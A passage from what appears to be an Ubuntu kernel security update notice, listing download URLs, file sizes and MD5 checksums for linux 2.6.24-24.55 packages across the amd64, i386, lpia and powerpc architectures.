http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    48658 639f3170e278823641666c3355710ce9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    86268 b2ae6f9d0f3397ab9d56b5ee2604f176
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    36310 1f5d7ef1723c827f6ec1727b3787f3a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   648378 1e2bb0cf23d1a130795cd9f745e76fe7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   209694 0235e8c39f85c8c59e5d8992d2c4d3fa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    39192 40b6ff3fb69584a473fd285329e2e2b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    67952 06997f3f9fd155b9d8fd19ed840a7f46
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   145266 94a9d3bf11d07fda05ba8d37e488c75e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   286678 5b1c737aa948d6e03fdc79cea2467968
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:  2128784 32fc2ee9b3e3e5fb2b1c8a2522acc991
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-generic_2.6.24-24.55_amd64.deb
  Size/MD5:   671194 533f220e2ed87ae41437a2e46d1135bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-openvz_2.6.24-24.55_amd64.deb
  Size/MD5:  1251290 0c12f1ec5d33bf9b98a2cf65411f0cf6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-rt_2.6.24-24.55_amd64.deb
  Size/MD5:  1273382 3dd530222979fbc4a0ec5846be3daa2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-server_2.6.24-24.55_amd64.deb
  Size/MD5:   671242 608ed557543bc3b12872b8731ac5594c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-xen_2.6.24-24.55_amd64.deb
  Size/MD5:  1082876 c87e898e14f6037d1e4ad8c2c9fbe726
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-generic_2.6.24-24.55_amd64.deb
  Size/MD5: 17801664 16b23af9d06baf9c80b4ffc5b2ac8ce0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-server_2.6.24-24.55_amd64.deb
  Size/MD5: 17771428 8122d12f5082445f9603d13335b83515
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-generic_2.6.24-24.55_amd64.deb
  Size/MD5: 21014464 68b73490ad11f3343768b5c201c70b25
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-server_2.6.24-24.55_amd64.deb
  Size/MD5: 21387618 3b1bee21e40c69175cd5d1d45c5bf353
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_amd64.deb
  Size/MD5:   705286 db77b2afae66f80b6692bb8a19cc602e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   263680 7f27a9bbc9cefe36cf9dc85d16423bc7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   176350 b51e4026bc049983ebd216f31169a41e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   253928 a60545ac2ad4d8cdaf08da09e555ad08
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:  1640052 b5d649f457aecfccea9ee1758b546bd9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   143684 0290beaef1a4ae3e291e20c517b979cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   164328 9124879a405d861d756f6dbeb40485b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   115838 6edbfc0f6d64e81778feec9bbe7d0388
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    35062 34b4bfd673f5b69d6a66d357d53913e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    64396 8913719a5eb39424e244f3aa3923ad56
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    69694 0a45f71737115cdcc8a8a7979bc9c01e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    21592 1e5dfd4b78a18cbe0615bfe4e656241d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:     8618 3353256d9abc6aac3c8904247fad36a8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    57178 34272f15a47eaead9a3bb5e8cabc99fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   102988 16f8a54269e7acfeec29642135518312
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:  1212082 7bfdf05b2a0e7a3e2a9bd69bfb74929a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    45470 57609f5c992b83ab16b19cb8bdacff4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    12772 ddb48f6ed471562112661169d41c09c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:   497808 bd328b4bfef64c9afaddaee236abdb91
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb
  Size/MD5:    74980 db1542ff52ce70a7fa58d678e70d1ab7
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-openvz_2.6.24-24.55_amd64.deb
  Size/MD5: 19242994 1c7114da74f213cc5cdb9599ecf7233d
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-rt_2.6.24-24.55_amd64.deb
  Size/MD5: 17890604 f7c54711409ec7c911b89a9e8d3cef47
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-xen_2.6.24-24.55_amd64.deb
  Size/MD5: 18900390 a6502ae7ee82cf1393310e22903b2763

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    23682 1c7aab194616a471285a9d250127a835
http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    26764 92a84719d2c4883b366d6d68d1820120
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   218684 eb3d8b92d6c4a48245724997a6121fc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   220440 40b53586ca28797dc014b8f656cf4725
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    51932 80258fa2f467ec10a1ec94ba389a247e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    52062 d84d679039a1dcb7a7a6e2be9a11bc9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    38324 ff2e0a017b7f58e42c276911d2b763ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    39080 50426ae4e5c02d35e95c5351665417cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    45866 27ce55188a7e0726ea19ac778c1b20bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    46012 ec9111a5e17c2b7cf80a8ec9d7eb574e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    83200 c17e82497048c7e436642aa16a8b4177
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    83580 d683701699212dcc121fb6c59096a766
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    32396 2476d6800fd166d9923a3b25e7284e37
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    32674 15560eb3ad638e98cf61e9ba41f59040
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   637392 0fecf174e6f568e2c6c7dad168bc3841
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   655480 3296fe2e55062e3b5b4b39e79e2104c6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   209782 13517227a395e3b14e02c55a04d9b4a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   213588 e303705801fc9b3fb8f04b49c18f8d20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    46558 47c3d466e4f4e2725a11e60e8869d501
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    47578 3680b979071cb88973c8aa33f94f2037
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    62250 79aec11c8be1c769f018f94cbe9c1e42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    63618 5f60fbf8b28c79d969bbda9f457e5761
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   130296 744b0747406ed2d6b4d57eac25a866ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   136874 923a1fde2cf0625dd1a4de29e9738fac
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   278542 56184e755e1b37390051b10d66615d8e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   277118 b273c46bbceb8d256b04295ea3f6bc5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:  2008816 96b6e6b4d202c7d4edcd9a4e9257e663
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:  2086100 0199324ff0fe5d6e7d833a3c07a6ac0a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-386_2.6.24-24.55_i386.deb
  Size/MD5:   652664 06b4ba3927add4c3a8fb5ee484129bd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-generic_2.6.24-24.55_i386.deb
  Size/MD5:   655538 f1aad1bb26f9fdaea6bee64cdf6e69d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-openvz_2.6.24-24.55_i386.deb
  Size/MD5:  1239292 17b21b1c71a637a1f3470befdc6e244c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-rt_2.6.24-24.55_i386.deb
  Size/MD5:  1259626 c857ca06ef5630c9b6faad7c13ef1449
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-server_2.6.24-24.55_i386.deb
  Size/MD5:   657340 e5fc27b2ba6419ae6110bfdb147dc50a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-virtual_2.6.24-24.55_i386.deb
  Size/MD5:   557898 1d6abe04efc461e263605280c3d6a327
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-xen_2.6.24-24.55_i386.deb
  Size/MD5:  1058088 1de1a8532504cfab66b9afb58aa7fd64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-386_2.6.24-24.55_i386.deb
  Size/MD5: 18368104 894bae5c45f3313fa6ffde9c5403a050
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-generic_2.6.24-24.55_i386.deb
  Size/MD5: 18389358 0f87aba56c1e970dcc7a05c178764c59
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-server_2.6.24-24.55_i386.deb
  Size/MD5: 18498588 f5c1063f494bd8000f41db10a4c923a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-virtual_2.6.24-24.55_i386.deb
  Size/MD5:  8686422 ff430f2f608d318cfdc9ee1f085232c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-386_2.6.24-24.55_i386.deb
  Size/MD5: 25497824 3fdb3a0bae1754cc7dcd5fc13e5c92f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-generic_2.6.24-24.55_i386.deb
  Size/MD5: 26304704 fbf86e8b9355cd2a4dc4e964ce93a1e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-server_2.6.24-24.55_i386.deb
  Size/MD5: 27324298 f2411de5448b6b3dc5041ae93e3fbad8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-virtual_2.6.24-24.55_i386.deb
  Size/MD5: 24820580 7c3be9e7dca67713529e3f593c28ca8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_i386.deb
  Size/MD5:   705292 e7ea84e2f6120b20e2718223efe47e4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   258744 758ec24355c4c81cb04be0b337b79d22
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   264062 c3f0e5c7f02e751e8db755eb939e493f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   163194 681a38c27b55f122aff23ddc43358e82
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   162950 64cab9f1cece7117949678fd7022be38
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   236500 02a04c11e39555ded5a1af39a31f2e1b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   244826 1536f32ebccf86886505f5c111275425
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:  1809006 eaa66dd9cdf3cae2f3387bc50b0aca3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:  1826238 ef6179911307b224bfbc9442d401168d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   150794 3dce18851cd0f9da0e49af7df236dac8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   142948 69d90acefce82696bb1db4f68bfc70c9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   155958 15a467bdd1e7bdbf50d61a024502acb4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   156974 69832b6793dd3c121ae93eada967077d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   107174 d2138453acdf0e700bdf074e33e99286
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   108480 fedf19d305e641f2d3c370dced2309e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    32962 e7bd906326133b9381e2cb49c8af646b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    33388 bcad2f4d1eb61a1d7d795e75854ca434
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    60704 84ae7bb7df1e8102cb7a7a190d963362
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    61154 66fd1b4c06a054c95fad67893640b621
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    82652 ce2130dbd82535557b662084e728928a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    82958 d439c65c130de9fa29027716f8710874
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    48356 daa2818cfb4b21a7032416c18182b147
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    48244 6a2211f86f7f8df90c5b8ceb38a4a627
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:     8190 b40afdf981d8fe354b20d0bc7cc83c3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:     8440 70afae21dbbd5f5cef34294c8de8e725
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    51050 5fe6712265c74000a7d92360c4d1ac81
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    52908 cf6981bb68eb23f899b6a55642238b7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    92184 fe7ae21dc89d89b1921f4ed7cbbabf59
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    92448 e18bed4505a2ca45dfd67499c87f3b8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:  1442928 f9784301cbe888b3a7610f69210845c9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:  1426196 fee708e2af1dab92610fb1c3496c95da
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    43236 4b344cdc662f35bad896e8c7bc726f21
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    42796 91578f1e887bac7983dae7884b357616
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    11406 097f3d4965b4fb4b62250309b71ea556
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    12016 4c3681d6ac324a27218a5d7f1eb012a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:   470332 975e3f02a4bdd541e27f7c917bcfcb11
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:   472254 3d79ecbffb9a08a25f5e818718137079
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb
  Size/MD5:    70450 aeb3fece9342114f992fec68f5d48f71
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb
  Size/MD5:    71368 a6bb96b015f25d08f5628aeedd3bcb81
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-openvz_2.6.24-24.55_i386.deb
  Size/MD5: 20243576 c1424fd878abdcd2a7bc29fc88369c9b
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-rt_2.6.24-24.55_i386.deb
  Size/MD5: 18527060 4213eff1e17851fd9a6ba77150b54638
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-xen_2.6.24-24.55_i386.deb
  Size/MD5: 18773284 a33c73287198621afbe02e414e91d696

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-lpia_2.6.24-24.55_lpia.deb
  Size/MD5:   636610 4747e9fa2334ce46a6f0700646291dd9
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-lpiacompat_2.6.24-24.55_lpia.deb
  Size/MD5:   703234 44e3bcfa9a931471c392192cfb0c54a8
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-lpia_2.6.24-24.55_lpia.deb
  Size/MD5: 14504750 5e482a7e08464985b808a6230a00d1b3
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_lpia.deb
  Size/MD5:   705278 c7d8b590dbff2f80c38689e174e2723a
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-24-lpiacompat_2.6.24-24.55_lpia.deb
  Size/MD5: 19810228 4d05fa4a2372061c0c1ac2637ee08ff6

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   334050 549350eae9ac212a55977acc795e683f
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   318864 ab27ac3a958eb09b9d12fafd09a77df8
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    62716 00b04f957690db8a0ba8a22438f2e496
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    73002 e8cb037fdde1bdb771482900638bb6d4
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    41434 88738c9f94ad51860b132ec86417d295
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    47824 b3c9f8d3e3d792c644dc6dff2da19df8
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    89458 52a345ac135c1ac50f528412b7d31f75
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   105682 57846bf90eef89a20cdf99b67e2f6b2a
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    44804 3f9bc834fa30a5f15a054bc4a1ffcae0
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    40928 a1c7bfd9166c6dbd96f79c7454d72bb4
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   704240 118333ea34b764806834b8da0975eb32
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   770534 f2ff41faa006ee681e1f0fa467626f98
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   242804 cd1d00ce97f420cc7a7ea0e73b11bc17
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   245874 bddc2d618001db1be1d3330b921e498a
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    69130 630b48f7871d88b3c2ec42ba406b56df
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   132574 c32734e71c98e17a3d3326c2d0caaa03
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    70240 1f2caeecf72dea50709079d5987714e8
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:    77438 9c53877ef28007ed1185a93ec5cf90f5
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb
  Size/MD5:   146066 8b3b83976cc2eec52b5dbb49568c2b44
